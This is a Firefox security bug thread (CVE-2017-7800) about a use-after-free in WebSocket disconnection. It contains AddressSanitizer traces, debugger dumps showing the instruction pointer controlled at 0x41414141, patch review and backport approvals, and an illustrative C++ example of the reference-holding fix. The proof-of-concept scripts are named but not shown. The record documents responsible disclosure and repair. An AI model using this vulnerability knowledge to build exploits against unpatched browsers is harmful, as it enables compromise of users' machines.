    #0 0x430489 in __interceptor_pthread_create /home/thecoder/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:243
    #1 0x7f892c5c8698 in _PR_CreateThread /home/thecoder/OpenSrc/firefox/nsprpub/pr/src/pthreads/ptthread.c:457:14
    #2 0x7f892c5c82aa in PR_CreateThread /home/thecoder/OpenSrc/firefox/nsprpub/pr/src/pthreads/ptthread.c:548:12
    #3 0x7f890e180897 in nsThread::Init(nsACString const&) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:685:8
    #4 0x7f8914b0eac0 in mozilla::dom::workers::WorkerThread::Create(mozilla::dom::workers::WorkerThreadFriendKey const&) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerThread.cpp:90:7
    #5 0x7f89149e82a4 in mozilla::dom::workers::RuntimeService::ScheduleWorker(mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/RuntimeService.cpp:1915:14
    #6 0x7f89149e5c8f in mozilla::dom::workers::RuntimeService::RegisterWorker(mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/RuntimeService.cpp:1742:19
    #7 0x7f8914ae62b6 in mozilla::dom::workers::WorkerPrivate::Constructor(JSContext*, nsAString const&, bool, mozilla::dom::WorkerType, nsAString const&, nsACString const&, mozilla::dom::workers::WorkerLoadInfo*, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:4660:8
    #8 0x7f8914ae5914 in Constructor /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:4577:10
    #9 0x7f8914ae5914 in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&, nsAString const&, mozilla::dom::WorkerOptions const&, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:4518
    #10 0x7f891294efbe in mozilla::dom::WorkerBinding::_constructor(JSContext*, unsigned int, JS::Value*) /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dom/bindings/WorkerBinding.cpp:973:68
    #11 0x7f891a34790b in CallJSNative /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:293:15
    #12 0x7f891a34790b in CallJSNativeConstructor /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:326
    #13 0x7f891a34790b in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:573
    #14 0x7f891a32e4c8 in ConstructFromStack /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:599:12
    #15 0x7f891a32e4c8 in Interpret(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:3059
    #16 0x7f891a315250 in js::RunScript(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:410:12
    #17 0x7f891a3491cb in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:699:15
    #18 0x7f891a349a49 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:731:12
    #19 0x7f891acf1bca in ExecuteScript(JSContext*, JS::AutoObjectVector&, JS::Handle<JSScript*>, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/jsapi.cpp:4635:12
    #20 0x7f8911622269 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&, JS::SourceBufferHolder&, JS::MutableHandle<JSScript*>) /home/thecoder/OpenSrc/firefox/dom/base/nsJSUtils.cpp:267:8
    #21 0x7f8914fcaab5 in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /home/thecoder/OpenSrc/firefox/dom/script/ScriptLoader.cpp:2118:20
    #22 0x7f8914fc669e in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /home/thecoder/OpenSrc/firefox/dom/script/ScriptLoader.cpp:1722:10
    #23 0x7f8914fabe76 in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /home/thecoder/OpenSrc/firefox/dom/script/ScriptLoader.cpp:1424:10
    #24 0x7f8914fa80fc in mozilla::dom::ScriptElement::MaybeProcessScript() /home/thecoder/OpenSrc/firefox/dom/script/ScriptElement.cpp:149:10
    #25 0x7f89105481ed in AttemptToExecute /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsIScriptElement.h:225:18
    #26 0x7f89105481ed in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /home/thecoder/OpenSrc/firefox/parser/html/nsHtml5TreeOpExecutor.cpp:698
    #27 0x7f8910541ab4 in nsHtml5TreeOpExecutor::RunFlushLoop() /home/thecoder/OpenSrc/firefox/parser/html/nsHtml5TreeOpExecutor.cpp:499:7
    #28 0x7f891057e2ab in nsHtml5ExecutorFlusher::Run() /home/thecoder/OpenSrc/firefox/parser/html/nsHtml5StreamParser.cpp:129:9
    #29 0x7f890e157a9f in mozilla::SchedulerGroup::Runnable::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/SchedulerGroup.cpp:368:14
    #30 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
    #31 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
    #32 0x7f890f22bc91 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:96:21
    #33 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #34 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #35 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #36 0x7f89151319ff in nsBaseAppShell::Run() /home/thecoder/OpenSrc/firefox/widget/nsBaseAppShell.cpp:156:3
    #37 0x7f8919da4eb7 in XRE_RunAppShell() /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:896:12
    #38 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #39 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #40 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #41 0x7f8919da4404 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:712:7
    #42 0x4f6255 in content_process_main /home/thecoder/OpenSrc/firefox/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #43 0x4f6255 in main /home/thecoder/OpenSrc/firefox/browser/app/nsBrowserApp.cpp:286
    #44 0x7f892b1ba82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-use-after-free /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:329:27 in assign_assuming_AddRef
Shadow bytes around the buggy address:
  0x0c2680012020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2680012030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2680012040: fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa
  0x0c2680012050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2680012060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c2680012070: fd[fd]fd fd fd fd fd fd fd fd fa fa fa fa fa fa
  0x0c2680012080: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2680012090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c26800120a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c26800120b0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c26800120c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==2917==ABORTING
(Reporter)

Comment 2

2 years ago
A POC UAF_DisconnectInternal_POC_EIP_41414141.js is attached to demonstrate the clear exploitability by controlling the EIP register.

Firefox Version: 56.0a1 (2017-06-17) (32-bit)
OS: Windows 10 Home 64-bit


(740.23a8): Access violation - code c0000005 (!!! second chance !!!)
eax=a1a1a1a1 ebx=1863b750 ecx=1863b750 edx=e5e5e5e5 esi=64136424 edi=1863b6a0
eip=41414141 esp=010fecdc ebp=010fece4 iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210282
41414141 ??              ???



FAULTING_IP: 
unknown!noop+0
41414141 ??              ???

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 41414141
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000008
   Parameter[1]: 41414141
Attempt to execute non-executable address 41414141


0x41414141
xul!mozilla::RefPtrTraits<mozilla::layers::LayersIPCChannel>::Release+0x6
xul!RefPtr<mozilla::layers::LayersIPCChannel>::ConstRemovingRefPtrTraits<mozilla::layers::LayersIPCChannel>::Release+0x6
xul!RefPtr<mozilla::layers::LayersIPCChannel>::assign_assuming_AddRef+0x18
xul!nsCOMPtr<nsIWeakReference>::operator=+0x9
xul!mozilla::dom::WebSocketImpl::DisconnectInternal+0x4b
xul!mozilla::dom::`anonymous namespace'::DisconnectInternalRunnable::MainThreadRun+0x8
xul!mozilla::dom::workers::WorkerMainThreadRunnable::Run+0x15
xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x6c
xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xf
xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x6c
xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xf
xul!nsThread::ProcessNextEvent+0x23a
xul!NS_ProcessNextEvent+0x14
xul!mozilla::ipc::MessagePump::Run+0x7a
xul!MessageLoop::RunInternal+0x8
xul!MessageLoop::RunHandler+0x20
xul!MessageLoop::Run+0x19
xul!nsBaseAppShell::Run+0x34
xul!nsAppShell::Run+0x26
Group: core-security → dom-core-security
Flags: sec-bounty?
Keywords: crash, csectype-uaf, sec-high, testcase
baku: you were recently in this code in bug 1369913 so this is probably freshest on your mind. This doesn't look like the same issue (Disconnect vs Send).
Flags: needinfo?(amarchesini)
Keywords: sec-high → sec-critical
(Assignee)

Updated

2 years ago
Assignee: nobody → amarchesini
Flags: needinfo?(amarchesini)
(Assignee)

Comment 4

2 years ago
Posted patch websocket.patch (obsolete) — Splinter Review
Attachment #8879832 - Flags: review?(bugs)
Comment on attachment 8879832 [details] [diff] [review]
websocket.patch

The callers of Disconnect() should keep the object alive, but I'm fine with this too since this is super simple to land to branches too.
Attachment #8879832 - Flags: review?(bugs) → review+
(Assignee)

Comment 6

2 years ago
Comment on attachment 8879832 [details] [diff] [review]
websocket.patch

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

Yes. There is a test included.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

Not particularly. I just keep WebSocketImpl alive before calling DisconnectInternal, instead of after.

Which older supported branches are affected by this flaw?

All.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

It's easy to backport.

How likely is this patch to cause regressions; how much testing does it need?

None.
Attachment #8879832 - Flags: sec-approval?
status-firefox54: --- → wontfix
status-firefox55: --- → affected
status-firefox56: --- → affected
status-firefox-esr52: --- → affected
tracking-firefox55: --- → +
tracking-firefox56: --- → +
tracking-firefox-esr52: --- → 55+
(In reply to Andrea Marchesini [:baku] from comment #6)
> Comment on attachment 8879832 [details] [diff] [review]
> websocket.patch
> 
> [Security approval request comment]
> How easily could an exploit be constructed based on the patch?
> 
> Yes. There is a test included.

This can't be checked in "as is" then.

Security bugs that need sec-approval can't have a test checked in with them, as the test will 0day our users.
We need the test and the fix separated into different patches and I can then sec-approval+ the fix and the test patch can land *after* we *ship* the fix in a final public release (such as Firefox 55).

The question above is more about "is this fix so obvious that checking in the fix points a giant sign as an exploitable security problem." I'll still need to understand the risk there when the patch is broken up.
Flags: needinfo?(amarchesini)
I see, now that I look at the patch, that there is no test so I guess this is a miscommunication.

I do see a Kungfu Deathgrip and, as Dan pointed out to me, the comment is kind of a giveaway: "DisconnectInternal() can release the object".

I'll give sec-approval+ but not for checkin until July 10, in the middle of the current development cycle.
Whiteboard: [checkin on 7/10]
Comment on attachment 8879832 [details] [diff] [review]
websocket.patch

Once this goes in, we'll want Beta and ESR52 patches nominated as well.
Attachment #8879832 - Flags: sec-approval? → sec-approval+
(Assignee)

Comment 10

2 years ago
> > Yes. There is a test included.
> 
> This can't be checked in "as is" then.

What I meant is that there is a script able to trigger the crash. This script is not included in the patch but it's available from the description of the bug.
Flags: needinfo?(amarchesini)
Yes, I see that. The sec-approval questions are about the checkin and patch since the bug won't be opened until after we ship. You have sec-approval+ to check in on July 10 or after.
https://hg.mozilla.org/integration/mozilla-inbound/rev/bc535203a6eff61f308eb8ddf13afe8268cccb9f

Note that the attached patch needed rebasing on trunk due to bug 1372453. The patch as-attached applies cleanly to Beta but will require a bit of trivial rebasing for ESR52. Please request Beta and ESR52 approval on the patch when you get a chance.
Flags: needinfo?(amarchesini)
Whiteboard: [checkin on 7/10]
https://hg.mozilla.org/mozilla-central/rev/bc535203a6ef
Status: NEW → RESOLVED
Last Resolved: 2 years ago
status-firefox56: affected → fixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla56
(Assignee)

Comment 14

2 years ago
Patch rebased
Attachment #8879832 - Attachment is obsolete: true
Flags: needinfo?(amarchesini)
(Assignee)

Comment 15

2 years ago
Comment on attachment 8885156 [details] [diff] [review]
websocket.patch

Approval Request Comment
[Feature/Bug causing the regression]: WebSocket implementation
[User impact if declined]: The WebSocket object can be released before completing the Disconnect() operation. This is a UAF.
[Is this code covered by automated tests?]: no tests. race condition.
[Has the fix been verified in Nightly?]: none
[Needs manual test from QE? If yes, steps to reproduce]: none 
[List of other uplifts needed for the feature/fix]: none
[Is the change risky?]: no.
[Why is the change risky/not risky?]: The ::Disconnect() method already uses a kungfuDeathGrip, but this must be created at the beginning.
[String changes made/needed]: none
Attachment #8885156 - Flags: approval-mozilla-esr52?
Attachment #8885156 - Flags: approval-mozilla-beta?
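The ordering discussed in comment 6 and comment 15, as an added example that is not Mozilla's code: a minimal intrusively refcounted stand-in for WebSocketImpl, a registry that holds the only strong reference to it, and a DisconnectInternal() that drops that reference. DisconnectBuggy() takes its kungFuDeathGrip after DisconnectInternal() has already been able to release the object; DisconnectFixed() takes it first. The names WebSocketLike, Registry, RefPtr, DisconnectBuggy(), DisconnectFixed() and RunScenario() are chosen for the illustration, and the simulated destructor quarantines the object (marks it destroyed and counts later member accesses) instead of freeing it, so the bad ordering is observable without touching freed memory.

```cpp
#include <algorithm>
#include <cstdio>
#include <vector>

// Minimal strong-reference holder in the spirit of mozilla's RefPtr.
template <class T>
class RefPtr {
public:
  explicit RefPtr(T* aPtr) : mPtr(aPtr) { if (mPtr) mPtr->AddRef(); }
  ~RefPtr() { if (mPtr) mPtr->Release(); }
  RefPtr(const RefPtr&) = delete;
  RefPtr& operator=(const RefPtr&) = delete;
  T* get() const { return mPtr; }
private:
  T* mPtr;
};

class Registry;

// Stand-in for WebSocketImpl (hypothetical name). On the last Release() it
// marks itself destroyed instead of running `delete this`, and every member
// access after that point is counted, so a use-after-free shows up as a
// number rather than as undefined behaviour.
class WebSocketLike {
public:
  explicit WebSocketLike(Registry* aRegistry) : mRegistry(aRegistry) {}

  void AddRef() { Touch(); ++mRefCnt; }
  void Release() {
    Touch();
    if (--mRefCnt == 0) {
      mDestroyed = true;  // real code would destroy the object here
    }
  }

  // Stand-in for DisconnectInternal(): drops the registry's strong reference,
  // which may be the last one.
  void DisconnectInternal();

  // The ordering the bug describes: the grip arrives after the object may
  // already have been released by DisconnectInternal().
  void DisconnectBuggy() {
    DisconnectInternal();
    RefPtr<WebSocketLike> kungFuDeathGrip(this);  // too late
    Touch();  // member access on a possibly freed object
  }

  // The fix: hold a strong reference for the whole method before anything
  // that can release the object runs.
  void DisconnectFixed() {
    RefPtr<WebSocketLike> kungFuDeathGrip(this);
    DisconnectInternal();
    Touch();  // safe: the grip keeps the object alive until scope exit
  }

  int UsesAfterDestroy() const { return mUsesAfterDestroy; }

private:
  void Touch() { if (mDestroyed) ++mUsesAfterDestroy; }

  Registry* mRegistry;
  int mRefCnt = 0;
  bool mDestroyed = false;
  int mUsesAfterDestroy = 0;
};

// Holds a strong reference to each registered object (hypothetical).
class Registry {
public:
  void Register(WebSocketLike* aWs) { aWs->AddRef(); mEntries.push_back(aWs); }
  void Unregister(WebSocketLike* aWs) {
    auto it = std::find(mEntries.begin(), mEntries.end(), aWs);
    if (it != mEntries.end()) { mEntries.erase(it); aWs->Release(); }
  }
private:
  std::vector<WebSocketLike*> mEntries;
};

void WebSocketLike::DisconnectInternal() {
  if (mRegistry) {
    Registry* registry = mRegistry;
    registry->Unregister(this);  // may drop the last reference to |this|
    Touch();
    mRegistry = nullptr;         // member write after the possible release
  }
}

// Runs one Disconnect() variant with the registry as the sole owner. Returns
// how many member accesses hit the object after it was destroyed; 0 is safe.
int RunScenario(bool aGripFirst) {
  Registry registry;
  WebSocketLike* ws = new WebSocketLike(&registry);
  registry.Register(ws);  // refcount 1: the registry is the only owner
  if (aGripFirst) { ws->DisconnectFixed(); } else { ws->DisconnectBuggy(); }
  int uses = ws->UsesAfterDestroy();
  delete ws;  // the simulated destructor only quarantined; free it for real
  return uses;
}

int main() {
  std::printf("grip after DisconnectInternal():  %d accesses after destroy\n", RunScenario(false));
  std::printf("grip before DisconnectInternal(): %d accesses after destroy\n", RunScenario(true));
  return 0;
}
```

The same shape applies to any intrusive-refcount code that notifies other holders from inside a member function: the strong reference has to be taken before the first call that can drop someone else's reference, not after it, because by then the object may already be gone.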
Group: dom-core-security → core-security-release
Comment on attachment 8885156 [details] [diff] [review]
websocket.patch

sec-critical, beta55+, esr52.3+
Attachment #8885156 - Flags: approval-mozilla-esr52?
Attachment #8885156 - Flags: approval-mozilla-esr52+
Attachment #8885156 - Flags: approval-mozilla-beta?
Attachment #8885156 - Flags: approval-mozilla-beta+
(In reply to Andrea Marchesini [:baku] from comment #15)
> [Is this code covered by automated tests?]: no tests. race condition.
> [Has the fix been verified in Nightly?]: none
> [Needs manual test from QE? If yes, steps to reproduce]: none 

Setting qe-verify- based on Andrea's assessment on manual testing needs.
Flags: qe-verify-
Flags: sec-bounty? → sec-bounty+
Alias: CVE-2017-7800
Whiteboard: [adv-main55+][adv-esr52.3+]
(In reply to Looben Yang from comment #2)
> A POC UAF_DisconnectInternal_POC_EIP_41414141.js is attached to demonstrate
> the clear exploitability by controlling the EIP register.
> 
> Firefox Version: 56.0a1 (2017-06-17) (32-bit)
> OS: Windows 10 Home 64-bit

I was not able to reproduce any kind of crash, let alone one showing EIP control, with these same conditions (except I'm using Win 10 Pro instead of Home). I also tried 64-bit Firefox builds to no avail.

With the original testcase I had been able to reproduce a UAF-looking crash in both 32-bit and 64-bit Firefox 54.0.1 builds.
(Reporter)

Comment 21

2 years ago
(In reply to Daniel Veditz [:dveditz] from comment #20)
> (In reply to Looben Yang from comment #2)
> > A POC UAF_DisconnectInternal_POC_EIP_41414141.js is attached to demonstrate
> > the clear exploitability by controlling the EIP register.
> > 
> > Firefox Version: 56.0a1 (2017-06-17) (32-bit)
> > OS: Windows 10 Home 64-bit
> 
> I was not able to reproduce any kind of crash, let alone one showing EIP
> control, with these same conditions (except I'm using Win 10 Pro instead of
> Home). I also tried 64-bit Firefox builds to no avail.
> 
> With the original testcase I had been able to reproduce a UAF-looking crash
> both 32-bit and 64-bit Firefox 54.0.1 builds.
(Reporter)

Comment 22

2 years ago
If it's not reproduced, then probably the timeout delay needs some adjustment.
I just simplified the PoC a little bit and attached it as UAF_DisconnectInternal_POC_EIP_41414141_2.js.

It seems a lot easier to reproduce on another machine. Daniel, can you give it a try with this one?



Firefox Version: 54.0.1 (32-bit)
OS: Windows 10 Pro 64-bit

(6060.2b6c): Access violation - code c0000005 (!!! second chance !!!)
eax=a1a1a1a1 ebx=195676a8 ecx=195676a8 edx=e5e5e5e5 esi=11c6d760 edi=19567600
eip=41414141 esp=00eff29c ebp=00eff2a4 iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210282
41414141 0000            add     byte ptr [eax],al          ds:002b:a1a1a1a1=41
0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\SysWOW64\nvwgf2um.dll - 
GetUrlPageData2 (WinHttp) failed: 12002.

FAULTING_IP: 
unknown!noop+0
41414141 0000            add     byte ptr [eax],al

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 41414141
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000008
   Parameter[1]: 41414141
Attempt to execute non-executable address 41414141

FAULTING_THREAD:  00002b6c

PROCESS_NAME:  firefox.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141 

FOLLOWUP_IP: 
unknown!noop+0
41414141 0000            add     byte ptr [eax],al

FAILED_INSTRUCTION_ADDRESS: 
unknown!noop+0
41414141 0000            add     byte ptr [eax],al

NTGLOBALFLAG:  400

APPLICATION_VERIFIER_FLAGS:  0

APP:  firefox.exe

ANALYSIS_VERSION: 10.0.10240.9 x86fre

IP_ON_HEAP:  41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

BUGCHECK_STR:  SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1

DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1

LAST_CONTROL_TRANSFER:  from 0ff025b0 to 41414141

STACK_TEXT:  
WARNING: Frame IP not in any known module. Following frames may be wrong.
00eff298 0ff025b0 e5e5e5e5 00eff2d4 10bb616e 0x41414141
00eff2a4 10bb616e 00000000 00000000 1e2b7a30 xul!RefPtr<mozilla::dom::StyleSheetList>::assign_assuming_AddRef+0x18
00eff2d4 10bb9dda 101dd28e 1ea744c0 1ea744f4 xul!mozilla::dom::WebSocketImpl::DisconnectInternal+0x4b
00eff2d8 101dd28e 1ea744c0 1ea744f4 00000000 xul!mozilla::dom::`anonymous namespace'::DisconnectInternalRunnable::MainThreadRun+0x8
00eff2ec 100852eb 1e2b7a30 196e89c0 196e89f4 xul!mozilla::dom::workers::WorkerMainThreadRunnable::Run+0x15
00eff314 1008526f 00eff344 100852eb 1f466970 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
00eff31c 100852eb 1f466970 0b7f5864 1e382670 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
00eff344 1008526f 00eff3c4 1001be8f 1e382670 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
00eff34c 1001be8f 1e382670 02e27170 02e27160 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
00eff3c4 1001d5ba 02e04200 00000000 00eff3f7 xul!nsThread::ProcessNextEvent+0x244
00eff3f8 101cb809 02e25060 293a22ed 0b7f5860 xul!mozilla::ipc::MessagePump::Run+0x72
00eff430 101cb7d8 02e04200 00000001 0b7f5800 xul!MessageLoop::RunHandler+0x20
00eff450 100ef8ce 0b7f7640 00000000 00eff470 xul!MessageLoop::Run+0x19
00eff460 100ef65d 0b7f5860 0b7f7640 00eff484 xul!nsBaseAppShell::Run+0x34
00eff470 100ef612 0b7f5860 00eff7d5 0d5ce080 xul!nsAppShell::Run+0x26
00eff484 100eeee6 0b7f7640 00eff6f0 00eff6d8 xul!nsAppStartup::Run+0x22
00eff678 1011dfc1 02e03050 00eff824 00000001 xul!XREMain::XRE_mainRun+0xa92
00eff6b4 1011d93d 02e101c0 02e10220 00eff824 xul!XREMain::XRE_main+0x366
00eff7e4 1011d8ff 00eff824 00effb68 00341bdd xul!XRE_main+0x39
00eff7f0 00341bdd 00000001 02e03050 00eff824 xul!mozilla::BootstrapImpl::XRE_main+0x11
00effb68 00345b3f 00000001 fe1a4498 00fa7560 firefox!wmain+0x65d
00effbb0 77958744 00c1e000 77958720 4de8583d firefox!__scrt_common_main_seh+0xf9
00effbc4 77e6587d 00c1e000 4d87acba 00000000 KERNEL32!BaseThreadInitThunk+0x24
00effc0c 77e6584d ffffffff 77e8632e 00000000 ntdll!__RtlUserThreadStart+0x2f
00effc1c 00000000 00345bb5 00c1e000 00000000 ntdll!_RtlUserThreadStart+0x1b


SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  unknown!noop+0

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: unknown

IMAGE_NAME:  unknown.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  0

STACK_COMMAND:  ~0s ; kb

BUCKET_ID:  SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1_BAD_IP_unknown!noop+0

PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1_BAD_IP_unknown!noop+0

FAILURE_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  unknown.dll

FAILURE_FUNCTION_NAME:  noop

FAILURE_SYMBOL_NAME:  unknown.dll!noop

FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1_c0000005_unknown.dll!noop

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:software_nx_fault_invalid_fill_pattern_a1a1a1a1_c0000005_unknown.dll!noop

FAILURE_ID_HASH:  {0b68b053-9232-2309-5b3f-b2f98916a7a4}

Followup:     MachineOwner
---------
Flags: needinfo?(dveditz)
That worked a lot better, especially when I switched to tinderbox builds instead of nightlies so they didn't keep auto-updating. Very reliably crashed executing 0x41414141 in a 32-bit build.

bp-302daa81-58d5-411f-b463-89e940170721
bp-2882dd22-a602-4c21-ae88-6fe020170721

(I have no idea why it thinks the install time was two days ago. I just unzipped it shortly before running the testcase and submitting the crash, and the zip itself was packed on the build date last month).
Flags: needinfo?(dveditz)
Group: core-security-release
Component: DOM → DOM: Core & HTML
Product: Core → Core